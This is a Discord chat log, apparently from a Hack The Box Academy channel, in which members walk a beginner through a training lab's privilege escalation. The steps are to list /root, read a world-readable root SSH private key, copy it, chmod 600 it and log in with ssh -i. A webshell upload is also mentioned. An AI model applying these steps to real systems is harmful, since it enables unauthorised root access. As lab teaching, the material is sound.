steel grail
next bronze
#

I know, look for hidden directories where you might find some keys for root

steel grail
#

Ohhh I see

#

i just got a huge list of letters

next bronze
#

read the past part of that section

fluid basin
#

Attacking common services lab-easy, I have uploaded the webshell but cannot do anything with it besides listing files. can sombody point me in the right direction please?

steel grail
steel grail
next bronze
#

did you chmod?

steel grail
next bronze
#

nope, use the private key, chmod it, then -i to use

steel grail
#

do i use the vim command?

#

i see the cmod section, just a little confused

next bronze
#

you need to copy it from the terminal, write it to your system (with vim or nano, whichever you like), chmod it, then -i to use

steel grail
#

so would it just be vim flag then?

#

errr

#

vim key

next bronze
#

vim is not a flag, it's a text editor, same as nano, when you use vim fileName it opens a new file fileName for you to write to

steel grail
#

or do i use vim id_rsa like the example?

next bronze
#

yes

steel grail
#

why would i not vim the key?

next bronze
#

what do you mean?

steel grail
#

ill dm u

#

if thats ok

next bronze
#

you can get verified at #welcome so that you can send images here

steel grail
#

see? should i have done vim rsa or vim key?

next bronze
#

are you using that in the ssh session?

steel grail
#

i think so

next bronze
#

2 things here: user2 is your current user, getting the key for that user wouldn't get you to root. find another key elsewhere that will
if the key exists in the target, can you use it? create the file in your own system, then ssh in

steel grail
#

i know the user 2 wont get me to root...

#

err flag i mean

#

ok so another key...

#

would gobuster be beneficial?

next bronze
#

no. where would the key for root be located?

steel grail
#

in user 2?

#

or even in the root user

#

but i cant get access to the root user

#

something about not knowing the password for user 2

next bronze
#

look up where is root's home dir

steel grail
#

Therefore, the home directory for the root user is in the path of /root.

#

is what i got

cedar void
#

So are any of you going to tryhackme until the spawn machines at HTB work again?

next bronze
fathom pendant
verbal tree
#

should i take notes about the fundamental modules?

cloud bone
#

not working at all here EU academy 1

cedar void
#

I take notes on all my modules

steel grail
next bronze
#

combine the information you have, you know root's home dir, you know where the keys are usually located

steel grail
#

yes i understand that but i cant access root unless i am logged in as root

#

im back at user 1 level

next bronze
#

get to user2

fathom pendant
astral inlet
#

damn target is not spawning

fathom pendant
steel grail
fathom pendant
#

things hide in the /root/

steel grail
fathom pendant
#

yes accessing specifically root however some things that are hidden can be seen

astral inlet
#

are you still taking about academy ?

fathom pendant
#

hidden directories are crucial to finding information

astral inlet
#

oh it spawned ...

#

yes true

steel grail
fathom pendant
#

ls -la?

astral inlet
#

you can do alias ls ="ls -la" saves lifes πŸ˜‰

fathom pendant
#

it's not hard to remember

steel grail
#

that i already used

fathom pendant
#

ls -la /root/

#

you can specify directories with it

steel grail
#

ah

fathom pendant
#

by default it's the current directory

steel grail
#

i understand that. still only gives me the original flag

fathom pendant
#

no; it doesn't

steel grail
#

well it did

fathom pendant
#

ls -la /root/ should list all files/directories in /root/

steel grail
#

ill send a screen shot

fathom pendant
#

there may be another file called flag.txt in the root dir

steel grail
#

yes

fathom pendant
#

but it's not the same

steel grail
#

well it is

#

let me just send a screen shot

fathom pendant
steel grail
#

i guess i need to chmod but im still confused on how to do thatr

fathom pendant
#

you don't need to chmod anything to do with flags

steel grail
#

it says i need to escalate my privalages to root

fathom pendant
#

indeed you do

steel grail
#

thats what ive been asking

fathom pendant
#

there's a hidden directory in /root/

steel grail
#

O_O

cedar void
#

US academy 3 also works for me as a spawn machine

next bronze
fathom pendant
steel grail
#

the hint says to chmod..

fathom pendant
#

yes, chmod a certain file

#

but not flag.txt

steel grail
#

i know that

fathom pendant
#

chmod [perms] file

#

but that's beside the point

#

unless you find the file it's all moot

#

bc you need to copy that file to your attack system

steel grail
#

its the key file

#

i got to that point and then i got into chmod and my whole thing messed up so i had to start over

fathom pendant
#

begins with -----BEGIN

steel grail
#

yes mam

fathom pendant
steel grail
#

ok my thing crashed i need to get back in

#

1 sec

fathom pendant
#

bc if you just try to ssh with that file you'll get an error saying something like "permissions too broad" or something like that

#

user|group|others
1 = x(execute)
2 = w(write)
4 = r(read)

next bronze
#

might be a bit of an overload to introduce octal perms now kekhands

fathom pendant
#

you can add the numbers together to get perms
rw------- = 600
rw-rw---- =660
rw-rw-rw- = 666

#

i mean chmod also has a manual entry Β―_(ツ)_/Β―

#

that can be easily be referenced

fathom pendant
next bronze
#

fair

fathom pendant
#

imo the octal format is much better but that's jsut because it's easier for me to parse

#

777 = "why do you need everybody to use this???"

steel grail
fathom pendant
steel grail
#

ok well im back into user 2

fathom pendant
#

the ssh key already exists for root

#

(and keygen only creates the key for your user)

#

ls -la /root/ and look for a hidden directory that might hold the key

steel grail
#

i see it but how do i escalate my privilages

#

cat: /root/flag.txt: Permission denied

fathom pendant
#

look at the output of
ls -la /root/

#

you will see there's more there than just flag.txt

steel grail
#

yes

fathom pendant
#

what folder do YOU think has what you're looking for

#

think: what protocol did you use to connect as user1

steel grail
#

ssh

fathom pendant
#

yes

#

now connect the dots

#

ls -la /root/[hidden directory] (replace [hidden directory] with the hidden directory you found)

#

in pretty much most filesystems a . indicates a hidden directory

#

not visible unless you specify you're looking for all

#

so /root/.whatever

steel grail
#

i did

fathom pendant
#

so you should see a file there; and it's interesting the perms on it

steel grail
#

all i see is flag.txt

fathom pendant
#

and we're back at square -1

astral inlet
#

show your output please

fathom pendant
#

Getting Started Knowledge check yeah?

steel grail
#

theres something getting lost in translationb between us

next bronze
#

show your output

steel grail
fathom pendant
#

ls -la is one command

steel grail
#

ohhhh

fathom pendant
#

-la is flags for ls

steel grail
#

rw------- 1 user2 user2 38 Feb 12 2021 flag.txt
-rw------- 1 user2 user2 2667 Jan 21 18:27 key
-rw-r--r-- 1 user2 user2 614 Jan 21 18:27 key.pub

astral inlet
#

man ls

fathom pendant
#

...

#

ls -la /root/

steel grail
#

sorry im slow

#

I got hit in the head a lot as a kid

astral inlet
#

i suggest to take the linux beginners course ... no offense

steel grail
#

drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-xr-x 1 root root 4096 Jan 21 17:53 ..
-rwxr-x--- 1 root user2 5 Aug 19 2020 .bash_history
-rwxr-x--- 1 root user2 3106 Dec 5 2019 .bashrc
-rwxr-x--- 1 root user2 161 Dec 5 2019 .profile
drwxr-x--- 1 root user2 4096 Feb 12 2021 .ssh
-rwxr-x--- 1 root user2 1309 Aug 19 2020 .viminfo
-rw------- 1 root root 33 Feb 12 2021 flag.txt

fathom pendant
steel grail
fathom pendant
#

ls -la /root/[hidden directory]

steel grail
#

its all coming together now

#

thanks marcie

fathom pendant
#

(at least you're picking it up though)

steel grail
#

ok so i see that, but i cannot cat the file without the right permisions

fathom pendant
#

yes, you can't cat flag.txt

astral inlet
#

maybe because you haver to login as root

fathom pendant
#

but you can cat something else

next bronze
steel grail
#

maybe the profile lol

fathom pendant
#

think again about the protocol you're using

astral inlet
#

look @ hidden dir

fathom pendant
#

also .profile is a file

#

not a directory

next bronze
#

connect the dots, where would the key be located at?

fathom pendant
#

[yes i know everything in linux is a file]

steel grail
#

im using ssh but .ssh is directory

astral inlet
#

and its hidden πŸ˜‰

#

bam.

fathom pendant
#

and i'm telling you to look there

steel grail
#

drwxr-x--- 1 root user2 4096 Feb 12 2021 .
drwxr-x--- 1 root user2 4096 Feb 12 2021 ..
-rw------- 1 root root 571 Feb 12 2021 authorized_keys
-rw-r--r-- 1 root root 2602 Feb 12 2021 id_rsa
-rw-r--r-- 1 root root 571 Feb 12 2021 id_rsa.pub

astral inlet
#

great

fathom pendant
astral inlet
#

me me me

steel grail
#

authorized keys!!!

fathom pendant
#

incorrect

steel grail
#

one of the other two then lmao

fathom pendant
#

authorized keys are for another purpose

cedar void
astral inlet
#

look at your permissions

fathom pendant
steel grail
next bronze
fathom pendant
#

the rw-|r--|r-- perms

#

in fact why does the id file have global read big_think_onion

steel grail
#

it has root permissions

astral inlet
#

because the admin is dumb πŸ˜„

fathom pendant
#

user|group|others

#

the key part here is the others

#

user/group should have read/read-write permissions

#

but not others (as in all other users)

steel grail
#

cat /root/.ssh/id_rsa
?

astral inlet
#

why donΒ΄t you look into your own .ssh folder and see what is there ?

fathom pendant
next bronze
fathom pendant
#

just do it and if it fails, come back and ask

cedar void
steel grail
#

i had already done it

#

ok so massive line of text.. its a key

late surge
#

ΰ€‡ΰ€• ΰ€¬ΰ₯‡ΰ€¨ ΰ€œΰ₯‹ΰ€ΰ€²

fathom pendant
astral inlet
#

yes its the private key

late surge
#

um hi\

late surge
#

sorry

next bronze
late surge
#

so

#

plss join

fathom pendant
#

this channel/discord isn't for that

late surge
#

live class dutch

fathom pendant
cedar void
fathom pendant
#

<@&861185840277487616>

late surge
#

ok

next bronze
fathom pendant
#

^

fathom pendant
cedar void
fathom pendant
#

if you need to attain creds; then the module has/or gave you a way within the scope of it to attain them

languid dawn
#

this isn't the discord for that @late surge

next bronze
late surge
#

ok

fathom pendant
#

as much as i hate pedantry this is important

late surge
#

so telnet{user ip}

fathom pendant
#

if you don't know what HTB is then please read #welcome ; if you've read welcome and realize this server isn't for you - Goodbye

late surge
#

i can hack you in 3 min

fathom pendant
next bronze
#

damn that's crazy

steel grail
#

ok so i have the private key...

late surge
#

wana se

#

give me the ip

urban sage
#

...

fathom pendant
fathom pendant
steel grail
#

you cant even hack with just an ip lol

fathom pendant
#

that's kinda how hacking works

#

you start with an exposed service on an ip; and work from there

steel grail
#

i mean yea

next bronze
fathom pendant
#

@steel grail i linked an article earlier about linux file permissions, and did a brief explanation of octal permissions btw

#

but in short you want to make sure only the user/group has read/read-write permissions

steel grail
#

chmod /root/.ssh/id_rsa

fathom pendant
#

nope

#

you can't chmod it as you aren't the owner

#

as I said earlier you gotta copy/paste it

#

also it's chmod [permissions] file

astral inlet
#

id_rsa needs 6xx

fathom pendant
#

but if you copy it to your attack box you can easily just do it from there

astral inlet
#

think about what to do with the id_rsa file,

#

what can you use it for ?

fathom pendant
#

so they need to make a copy for themselves

steel grail
#

hmod 600 /root/.ssh/id_rsa
chmod: changing permissions of '/root/.ssh/id_rsa': Operation not permitted

astral inlet
#

maybe wrong machine ?

steel grail
#

i copied and pasted the key

fathom pendant
#

you need to copy/paste the contents of the file to your own machine

fathom pendant
#

so you cat the id_rsa file -> select all -> copy -> paste into a text editor on your attack machine -> save -> chmod [permissions] file

#

you can't change the id_rsa that exists in /root/ bc it's owned by root

steel grail
#

its in a plaintext editor on my VM

rustic sage
astral inlet
#

guess what we wanna do with the id_rsa πŸ˜‰

steel grail
#

or is it vim /root/.ssh/id_rsa

next bronze
steel grail
#

i sure did

fathom pendant
#

or what editor you used

steel grail
#

i know

fathom pendant
#

now how do you use id files with ssh?

steel grail
#

its on my desktop as plaintext.txt

astral inlet
#

sorry to ask on which module are you ?

#

SSH ?

fathom pendant
#

Getting Started - Privelege Escalation

astral inlet
#

no good start tbh

fathom pendant
#

literally just ran through this on my machine and it works

#

at this point it's literally just user error Β―_(ツ)_/Β―

astral inlet
#

layer 8 yes

steel grail
#

I know it works im just stuck on what i do with the key

astral inlet
#

ssh -i

steel grail
#

its on my desktop

astral inlet
#

later

steel grail
#

in a plaintext file

lusty thicket
astral inlet
#

i do the pentester path to do CTSP later , i suggest to take the basic modules

#

if you miss basics you will get very frustrated

steel grail
#

yall tell to me to chmod it but i cant

astral inlet
#

easy

steel grail
astral inlet
#

mv bla.txt id_rsa

#

chmod 600 id_rsa

#

priv esc is NOT basic πŸ™‚

fathom pendant
#

tbf this is relatively basic usage of tools

astral inlet